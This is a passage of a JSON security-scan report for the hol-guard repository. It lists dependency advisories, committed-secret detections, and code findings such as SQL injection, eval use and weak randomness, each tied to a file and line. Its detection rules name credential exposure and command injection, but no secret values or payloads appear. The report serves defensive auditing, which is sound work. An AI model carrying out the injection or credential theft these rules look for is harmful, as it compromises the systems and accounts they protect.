"shortDescription": {"text": "stdlib: GO-2025-4010"}, "fullDescription": {"text": "Insufficient validation of bracketed IPv6 hostnames in net/url"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4009", "name": "stdlib: GO-2025-4009", "shortDescription": {"text": "stdlib: GO-2025-4009"}, "fullDescription": {"text": "Quadratic complexity when parsing some invalid inputs in encoding/pem"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4008", "name": "stdlib: GO-2025-4008", "shortDescription": {"text": "stdlib: GO-2025-4008"}, "fullDescription": {"text": "ALPN negotiation error contains attacker controlled information in crypto/tls"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4007", "name": "stdlib: GO-2025-4007", "shortDescription": {"text": "stdlib: GO-2025-4007"}, "fullDescription": {"text": "Quadratic complexity when checking name constraints in crypto/x509"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4006", "name": "stdlib: GO-2025-4006", "shortDescription": {"text": "stdlib: GO-2025-4006"}, "fullDescription": {"text": "Excessive CPU consumption in ParseAddress in net/mail"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GHSA-gv7v-rgg6-548h", "name": "laravel/framework: GHSA-gv7v-rgg6-548h", "shortDescription": {"text": "laravel/framework: GHSA-gv7v-rgg6-548h"}, "fullDescription": {"text": "Laravel environment manipulation via query string"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "MINED009", "name": "[MINED009] Floats For Money: Variable named price/amount/cost typed as float instead of Decimal.", "shortDescription": {"text": "[MINED009] Floats For Money: Variable named price/amount/cost typed as float instead of Decimal."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-682 /  for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC128", "name": "[SEC128] Async function without await \u2014 fire-and-forget Promise (AI mistake): Async call invoked without `await` returns", "shortDescription": {"text": "[SEC128] Async function without await \u2014 fire-and-forget Promise (AI mistake): Async call invoked without `await` returns an unhandled Promise. The outer function resolves before the inner work completes \u2014 DB writes lost, emails not sent, ra"}, "fullDescription": {"text": "Add `await` before each async call, or chain with `.then`. If you intentionally want fire-and-forget, prefix with `void` (TS) or assign to `_` (Python with `asyncio.create_task`) to make the intent explicit and survive lint."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED006", "name": "[MINED006] Overcatch Baseexception: except BaseException: ... \u2014 prevents Ctrl+C and SystemExit from working.", "shortDescription": {"text": "[MINED006] Overcatch Baseexception: except BaseException: ... \u2014 prevents Ctrl+C and SystemExit from working."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-705 /  for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED004", "name": "[MINED004] Weak Crypto: MD5/SHA1/DES/RC4 used for security context (not just checksums).", "shortDescription": {"text": "[MINED004] Weak Crypto: MD5/SHA1/DES/RC4 used for security context (not just checksums)."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-327 / A02:2021 for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC078", "name": "[SEC078] Python: requests without timeout: requests.get/post without a timeout will hang indefinitely on a non-responsiv", "shortDescription": {"text": "[SEC078] Python: requests without timeout: requests.get/post without a timeout will hang indefinitely on a non-responsive server, causing thread exhaustion and ReDoS. Ported from bandit B113 (Apache-2.0). NOTE: this regex is heuristic; a re"}, "fullDescription": {"text": "Add `timeout=10` (or appropriate value) to every requests call."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC085", "name": "[SEC085] JS: child_process.exec with non-literal: child_process.exec with user-derived input enables command injection. ", "shortDescription": {"text": "[SEC085] JS: child_process.exec with non-literal: child_process.exec with user-derived input enables command injection. Ported from eslint-plugin-security detect-child-process (Apache-2.0)."}, "fullDescription": {"text": "Use execFile / spawn with separate args array; never pass shell strings."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED118", "name": "Dockerfile FROM `codex_plugin_scanner.cli (no tag)` not pinned by digest", "shortDescription": {"text": "Dockerfile FROM `codex_plugin_scanner.cli (no tag)` not pinned by digest"}, "fullDescription": {"text": "`FROM codex_plugin_scanner.cli (no tag)` resolves the tag at build time. The registry CAN re-push a different image for the same tag, so every build is potentially different. Production images should pin to `image@sha256:...` for reproducibility + supply-chain integrity."}, "properties": {"scanner": "repobility-supply-chain", "category": "dependency", "severity": "high", "confidence": 0.9, "cwe": "", "owasp": ""}}, {"id": "MINED106", "name": "Phantom test coverage: test_future_generated_at_fails", "shortDescription": {"text": "Phantom test coverage: test_future_generated_at_fails"}, "fullDescription": {"text": "Test function `test_future_generated_at_fails` runs code but contains no assert / expect / should call \u2014 it passes regardless of behaviour. Adds line coverage without verifying anything."}, "properties": {"scanner": "repobility-ast-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED108", "name": "`self.send_header` used but never assigned in __init__", "shortDescription": {"text": "`self.send_header` used but never assigned in __init__"}, "fullDescription": {"text": "Method `do_POST` of class `_RejectedEventHandler` reads `self.send_header`, but no assignment to it exists in __init__ (and no class-level fallback). This raises AttributeError the first time the method runs against an instance."}, "properties": {"scanner": "repobility-ast-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "github-pat", "name": "Uncovered a GitHub Personal Access Token, potentially leading to unauthorized repository access and sensitive content ex", "shortDescription": {"text": "Uncovered a GitHub Personal Access Token, potentially leading to unauthorized repository access and sensitive content exposure."}, "fullDescription": {"text": "Gitleaks detected a committed secret or credential pattern."}, "properties": {"scanner": "gitleaks", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "cwe": "", "owasp": ""}}, {"id": "private-key", "name": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption.", "shortDescription": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "fullDescription": {"text": "Gitleaks detected a committed secret or credential pattern."}, "properties": {"scanner": "gitleaks", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "cwe": "", "owasp": ""}}, {"id": "curl-auth-user", "name": "Discovered a potential basic authorization token provided in a curl command, which could compromise the curl accessed re", "shortDescription": {"text": "Discovered a potential basic authorization token provided in a curl command, which could compromise the curl accessed resource."}, "fullDescription": {"text": "Gitleaks detected a committed secret or credential pattern."}, "properties": {"scanner": "gitleaks", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "cwe": "", "owasp": ""}}, {"id": "generic-api-key", "name": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations.", "shortDescription": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "fullDescription": {"text": "Gitleaks detected a committed secret or credential pattern."}, "properties": {"scanner": "gitleaks", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "cwe": "", "owasp": ""}}, {"id": "curl-auth-header", "name": "Discovered a potential authorization token provided in a curl command header, which could compromise the curl accessed r", "shortDescription": {"text": "Discovered a potential authorization token provided in a curl command header, which could compromise the curl accessed resource."}, "fullDescription": {"text": "Gitleaks detected a committed secret or credential pattern."}, "properties": {"scanner": "gitleaks", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "cwe": "", "owasp": ""}}, {"id": "MINED007", "name": "[MINED007] Sql String Concat: cursor.execute(f\"... {user_input} ...\") \u2014 SQL injection.", "shortDescription": {"text": "[MINED007] Sql String Concat: cursor.execute(f\"... {user_input} ...\") \u2014 SQL injection."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-89 / A03:2021 for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "critical", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED024", "name": "[MINED024] Js Eval Usage: eval() executes arbitrary code. Code injection risk.", "shortDescription": {"text": "[MINED024] Js Eval Usage: eval() executes arbitrary code. Code injection risk."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-95 /  for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "critical", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED107", "name": "Missing import: `signal` used but not imported", "shortDescription": {"text": "Missing import: `signal` used but not imported"}, "fullDescription": {"text": "The file uses `signal.something(...)` but never imports `signal`. This raises NameError at runtime the first time the line executes."}, "properties": {"scanner": "repobility-ast-engine", "category": "quality", "severity": "critical", "confidence": 1.0, "cwe": "", "owasp": ""}}]}}, "automationDetails": {"id": "repobility/1411"}, "properties": {"repository": "hashgraph-online/hol-guard", "repoUrl": "https://github.com/hashgraph-online/hol-guard", "branch": "main"}, "results": [{"ruleId": "JRN002", "level": "warning", "message": {"text": "Browser storage is used for session token material"}, "properties": {"repobilityId": 145129, "scanner": "repobility-journey-contract", "fingerprint": "741b8241bf92cf2776bdb88f4a2cbc8ad7f05edf17920c396fff9978605aef44", "category": "auth", "severity": "medium", "confidence": 0.82, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Storage API call references token-like key or value names.", "evidence": {"rule_id": "JRN002", "scanner": "repobility-journey-contract", "references": ["https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html"], "correlation_key": "code|auth|dashboard/src/guard-api.ts|177|jrn002"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/guard-api.ts"}, "region": {"startLine": 177}}}]}, {"ruleId": "JRN002", "level": "warning", "message": {"text": "Browser storage is used for session token material"}, "properties": {"repobilityId": 145128, "scanner": "repobility-journey-contract", "fingerprint": "a01a7796ae40a895bc69a4c75fa30c211d81d7e779f472748f6fdc5480f30456", "category": "auth", "severity": "medium", "confidence": 0.82, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Storage API call references token-like key or value names.", "evidence": {"rule_id": "JRN002", "scanner": "repobility-journey-contract", "references": ["https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html"], "correlation_key": "code|auth|dashboard/src/guard-api.ts|172|jrn002"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/guard-api.ts"}, "region": {"startLine": 172}}}]}, {"ruleId": "JRN002", "level": "warning", "message": {"text": "Browser storage is used for session token material"}, "properties": {"repobilityId": 145127, "scanner": "repobility-journey-contract", "fingerprint": "cf90bf983ac897e97c84a737a74a6b6cab7bf1526e3c956a9e954f8480c53b4b", "category": "auth", "severity": "medium", "confidence": 0.82, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Storage API call references token-like key or value names.", "evidence": {"rule_id": "JRN002", "scanner": "repobility-journey-contract", "references": ["https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html"], "correlation_key": "code|auth|dashboard/src/guard-api.ts|169|jrn002"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/guard-api.ts"}, "region": {"startLine": 169}}}]}, {"ruleId": "GHSA-65pc-fj4g-8rjx", "level": "warning", "message": {"text": "idna: GHSA-65pc-fj4g-8rjx"}, "properties": {"repobilityId": 145121, "scanner": "osv-scanner", "fingerprint": "3cb0e6e51097792f0802522bd5a1c534f3c96b9d90576d70a538075f8c4d5bb0", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-45409"], "package": "idna", "rule_id": "GHSA-65pc-fj4g-8rjx", "scanner": "osv-scanner", "correlation_key": "vuln|idna|CVE-2024-3651|uv.lock"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "uv.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-jg22-mg44-37j8", "level": "warning", "message": {"text": "aiohttp: GHSA-jg22-mg44-37j8"}, "properties": {"repobilityId": 145120, "scanner": "osv-scanner", "fingerprint": "f360dcc0eba31763fb048fbf952ff9aaacd93fae36b950018274d5457fa1322d", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-34993"], "package": "aiohttp", "rule_id": "GHSA-jg22-mg44-37j8", "scanner": "osv-scanner", "correlation_key": "vuln|aiohttp|CVE-2026-34993|uv.lock"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "uv.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-hg6j-4rv6-33pg", "level": "warning", "message": {"text": "aiohttp: GHSA-hg6j-4rv6-33pg"}, "properties": {"repobilityId": 145119, "scanner": "osv-scanner", "fingerprint": "2da1f8cf81a5e62587e98e266536e6b0ec96ebc178f00a59702cebb0a7957e28", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-47265"], "package": "aiohttp", "rule_id": "GHSA-hg6j-4rv6-33pg", "scanner": "osv-scanner", "correlation_key": "vuln|aiohttp|CVE-2026-47265|uv.lock"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "uv.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-83wp-f5c3-hqqr", "level": "warning", "message": {"text": "laravel/framework: GHSA-83wp-f5c3-hqqr"}, "properties": {"repobilityId": 145081, "scanner": "osv-scanner", "fingerprint": "248705eabde50cbabf9eb48902f907938c49604d9d7f1f91dd50dd342126ef89", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2024-13919"], "package": "laravel/framework", "rule_id": "GHSA-83wp-f5c3-hqqr", "scanner": "osv-scanner", "correlation_key": "vuln|laravel/framework|CVE-2024-13919|token"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/composer-safe/composer.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-78fx-h6xr-vch4", "level": "warning", "message": {"text": "laravel/framework: GHSA-78fx-h6xr-vch4"}, "properties": {"repobilityId": 145080, "scanner": "osv-scanner", "fingerprint": "82a801d2dd2079c9971da48f7651319a793c056890aa3f3029c4f458a07bfa76", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-laravel-2025-27515", "CVE-2025-27515"], "package": "laravel/framework", "rule_id": "GHSA-78fx-h6xr-vch4", "scanner": "osv-scanner", "correlation_key": "vuln|laravel/framework|CVE-2025-27515|token", "duplicate_count": 1, "duplicate_rule_ids": ["GHSA-78fx-h6xr-vch4"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["82a801d2dd2079c9971da48f7651319a793c056890aa3f3029c4f458a07bfa76", "89dba378cfc4088bb86bf11271d3422d5d652708bd596fa2b43b6bbcf2919fd6"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/composer-safe/composer.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-546h-56qp-8jmw", "level": "warning", "message": {"text": "laravel/framework: GHSA-546h-56qp-8jmw"}, "properties": {"repobilityId": 145079, "scanner": "osv-scanner", "fingerprint": "9ab215086e06d18c106026d6d7cfabfcdf789713e5c2e0f9a6c5fe85b47c5adb", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2024-13918"], "package": "laravel/framework", "rule_id": "GHSA-546h-56qp-8jmw", "scanner": "osv-scanner", "correlation_key": "vuln|laravel/framework|CVE-2024-13918|token"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/composer-safe/composer.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-65pc-fj4g-8rjx", "level": "warning", "message": {"text": "idna: GHSA-65pc-fj4g-8rjx"}, "properties": {"repobilityId": 145073, "scanner": "osv-scanner", "fingerprint": "096ad1adcda9b23f165f1175fd8691f1cfd4f580557aea52903b73ec76fbc472", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-45409"], "package": "idna", "rule_id": "GHSA-65pc-fj4g-8rjx", "scanner": "osv-scanner", "correlation_key": "vuln|idna|CVE-2024-3651|requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-jg22-mg44-37j8", "level": "warning", "message": {"text": "aiohttp: GHSA-jg22-mg44-37j8"}, "properties": {"repobilityId": 145072, "scanner": "osv-scanner", "fingerprint": "bb971f373dd7f2acff955adba1f92b12c942492a97f08458a8dadaa7c18e93e6", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-34993"], "package": "aiohttp", "rule_id": "GHSA-jg22-mg44-37j8", "scanner": "osv-scanner", "correlation_key": "vuln|aiohttp|CVE-2026-34993|requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-hg6j-4rv6-33pg", "level": "warning", "message": {"text": "aiohttp: GHSA-hg6j-4rv6-33pg"}, "properties": {"repobilityId": 145071, "scanner": "osv-scanner", "fingerprint": "24ce5e6eaf33a3edf2b03cfe1c286736bc081473f99e56bf36436aa03b363f3d", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-47265"], "package": "aiohttp", "rule_id": "GHSA-hg6j-4rv6-33pg", "scanner": "osv-scanner", "correlation_key": "vuln|aiohttp|CVE-2026-47265|requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-65pc-fj4g-8rjx", "level": "warning", "message": {"text": "idna: GHSA-65pc-fj4g-8rjx"}, "properties": {"repobilityId": 145065, "scanner": "osv-scanner", "fingerprint": "b6db551b325a6de8c429bd6afe8f65bd31671fcbeaba6ba5c7b25de07a588e84", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-45409"], "package": "idna", "rule_id": "GHSA-65pc-fj4g-8rjx", "scanner": "osv-scanner", "correlation_key": "vuln|idna|CVE-2024-3651|docker-requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "docker-requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-jg22-mg44-37j8", "level": "warning", "message": {"text": "aiohttp: GHSA-jg22-mg44-37j8"}, "properties": {"repobilityId": 145064, "scanner": "osv-scanner", "fingerprint": "84514b809d7cb26363042eaba8cc3f8e0b9cb2af3cc7cb8a0c9347617ef729fb", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-34993"], "package": "aiohttp", "rule_id": "GHSA-jg22-mg44-37j8", "scanner": "osv-scanner", "correlation_key": "vuln|aiohttp|CVE-2026-34993|docker-requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "docker-requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-hg6j-4rv6-33pg", "level": "warning", "message": {"text": "aiohttp: GHSA-hg6j-4rv6-33pg"}, "properties": {"repobilityId": 145063, "scanner": "osv-scanner", "fingerprint": "16f1c4adb7231182ee02968348577e11190247968bf8d548b699e86fe1ba0a9a", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-47265"], "package": "aiohttp", "rule_id": "GHSA-hg6j-4rv6-33pg", "scanner": "osv-scanner", "correlation_key": "vuln|aiohttp|CVE-2026-47265|docker-requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "docker-requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "DKR002", "level": "warning", "message": {"text": "Dockerfile base image has no explicit tag"}, "properties": {"repobilityId": 145035, "scanner": "repobility-docker", "fingerprint": "4c131747a64a9f2082a10016e32d2edb905e42662ab52f20107a1dbabe65e5a5", "category": "docker", "severity": "medium", "confidence": 0.9, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Image reference has no tag or digest.", "evidence": {"image": "codex_plugin_scanner.cli", "rule_id": "DKR002", "scanner": "repobility-docker", "references": ["https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", "https://docs.docker.com/scout/policy/", "https://github.com/hadolint/hadolint"], "correlation_key": "fp|4c131747a64a9f2082a10016e32d2edb905e42662ab52f20107a1dbabe65e5a5"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "Dockerfile"}, "region": {"startLine": 36}}}]}, {"ruleId": "DKR002", "level": "warning", "message": {"text": "Dockerfile base image has no explicit tag"}, "properties": {"repobilityId": 145034, "scanner": "repobility-docker", "fingerprint": "60ae264d80b41cdb3638e40256510f2728aa7fd778781e3f15ba6c648dafc4a1", "category": "docker", "severity": "medium", "confidence": 0.9, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Image reference has no tag or digest.", "evidence": {"image": "__future__", "rule_id": "DKR002", "scanner": "repobility-docker", "references": ["https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", "https://docs.docker.com/scout/policy/", "https://github.com/hadolint/hadolint"], "correlation_key": "fp|60ae264d80b41cdb3638e40256510f2728aa7fd778781e3f15ba6c648dafc4a1"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "Dockerfile"}, "region": {"startLine": 17}}}]}, {"ruleId": "DKR001", "level": "warning", "message": {"text": "Docker final stage has no non-root USER"}, "properties": {"repobilityId": 145031, "scanner": "repobility-docker", "fingerprint": "9f09597e0dda606b6105e1f1cc7e41f8d4b5e85b5e03c94162198cc2794304fa", "category": "docker", "severity": "medium", "confidence": 0.82, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "No USER directive was found in the final runtime stage.", "evidence": {"rule_id": "DKR001", "scanner": "repobility-docker", "final_base": "gcr.io/oss-fuzz-base/base-builder-python@sha256:721650302bfda2f3832df73bb24aeacfa41c32e692f3d6e4dd06074e79c64ed7", "references": ["https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", "https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html", "https://github.com/hadolint/hadolint"], "correlation_key": "fp|9f09597e0dda606b6105e1f1cc7e41f8d4b5e85b5e03c94162198cc2794304fa"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": ".clusterfuzzlite/Dockerfile"}, "region": {"startLine": 1}}}]}, {"ruleId": "DKR014", "level": "warning", "message": {"text": "Dockerfile copies broad context with incomplete .dockerignore"}, "properties": {"repobilityId": 145030, "scanner": "repobility-docker", "fingerprint": "84ccd41d41077e6d8c173d7fe793b2920745039cd8f9f316f45300d7543d5edc", "category": "docker", "severity": "medium", "confidence": 0.76, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Broad context copy found and .dockerignore misses sensitive defaults.", "evidence": {"rule_id": "DKR014", "scanner": "repobility-docker", "references": ["https://docs.docker.com/develop/develop-images/dockerfile_best-practices/"], "correlation_key": "fp|84ccd41d41077e6d8c173d7fe793b2920745039cd8f9f316f45300d7543d5edc", "missing_patterns": [".env", "id_rsa", "*.pem", "*.key"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": ".clusterfuzzlite/Dockerfile"}, "region": {"startLine": 7}}}]}, {"ruleId": "SEC119", "level": "warning", "message": {"text": "[SEC119] World-writable / world-readable file permissions: World-writable files let any local user (or container neighbor) tamper with data; world-readable files leak secrets."}, "properties": {"repobilityId": 145025, "scanner": "repobility-threat-engine", "fingerprint": "ef7f50c0ea92fc4cc0a22750b805bce4f34a93f7b9062bcf30c42b61ab10e20c", "category": "security", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "os.chmod(self.base_dir, 0o700)", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC119", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|security|token|35|sec119"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/totp.py"}, "region": {"startLine": 35}}}]}, {"ruleId": "SEC042", "level": "warning", "message": {"text": "[SEC042] SQL identifier injection via f-string in cursor execute: f-string SQL normalizes an unsafe pattern. Currently safe when only trusted internal values are interpolated (e.g. self._table in Odoo), but a future contributor can extend the f-string to user input without noticing. CWE-89. Identifiers (table/column names) need a separate escaping path from values."}, "properties": {"repobilityId": 145024, "scanner": "repobility-threat-engine", "fingerprint": "b733b9bfa76d215329ef98dcfdb1a327a1ffe33879732a0d51668f4d68f61765", "category": "injection", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "connection.execute(\n        f\"", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC042", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|injection|token|159|sec042"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store_resume.py"}, "region": {"startLine": 159}}}]}, {"ruleId": "SEC015", "level": "warning", "message": {"text": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. Output is predictable."}, "properties": {"repobilityId": 145018, "scanner": "repobility-threat-engine", "fingerprint": "a050f910600b210ad85b66ff06da72d52f0580de637290c1eee9f95699fb574c", "category": "crypto", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Security-sensitive keyword found nearby \u2014 weak PRNG is risky here", "evidence": {"match": "def generate_totp_secret", "reason": "Security-sensitive keyword found nearby \u2014 weak PRNG is risky here", "rule_id": "SEC015", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|crypto|token|95|sec015"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/totp.py"}, "region": {"startLine": 95}}}]}, {"ruleId": "SEC015", "level": "warning", "message": {"text": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. Output is predictable."}, "properties": {"repobilityId": 145017, "scanner": "repobility-threat-engine", "fingerprint": "6384cf219c7d60da7e43869f72ca4bd3a5da40dd78fbb43c46b6c3340299628e", "category": "crypto", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Security-sensitive keyword found nearby \u2014 weak PRNG is risky here", "evidence": {"match": "def build_local_dashboard_session_token", "reason": "Security-sensitive keyword found nearby \u2014 weak PRNG is risky here", "rule_id": "SEC015", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|crypto|token|18|sec015"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/local_dashboard_session.py"}, "region": {"startLine": 18}}}]}, {"ruleId": "SEC136", "level": "warning", "message": {"text": "[SEC136] AI-typical over-broad exception handler swallowing all errors: Catch-all exception block that silently returns success or no-ops. AI agents reach for this pattern when a flaky test or an unfamiliar API throws \u2014 wrap, swallow, return success. Real bugs are masked, observability is destroyed, and callers think the operation worked. CWE-396 (improperly-generalized exception). Distinct from intentional fallback because there's no log line and the success value is fabricated."}, "properties": {"repobilityId": 145015, "scanner": "repobility-threat-engine", "fingerprint": "a8e3245aa57b72109a3cf59b885ef5726e5418aacfa70282eacfbe11f6fe5347", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "try:\n            resp = requests.get(f\"{guard_url}/v1/requests\", timeout=10)\n            if resp.sta", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC136", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|a8e3245aa57b72109a3cf59b885ef5726e5418aacfa70282eacfbe11f6fe5347"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/bridge/__init__.py"}, "region": {"startLine": 200}}}]}, {"ruleId": "COMP001", "level": "warning", "message": {"text": "[COMP001] High cognitive complexity: Function `check_skill_frontmatter` has cognitive complexity 17 (SonarSource scale). Cognitive complexity measures how hard the function is for a human to understand \u2014 nested branches, boolean chains, and recursion all weigh in. Breakdown: continue=3, except=1, for=1, if=8, nested_bonus=4."}, "properties": {"repobilityId": 144994, "scanner": "repobility-threat-engine", "fingerprint": 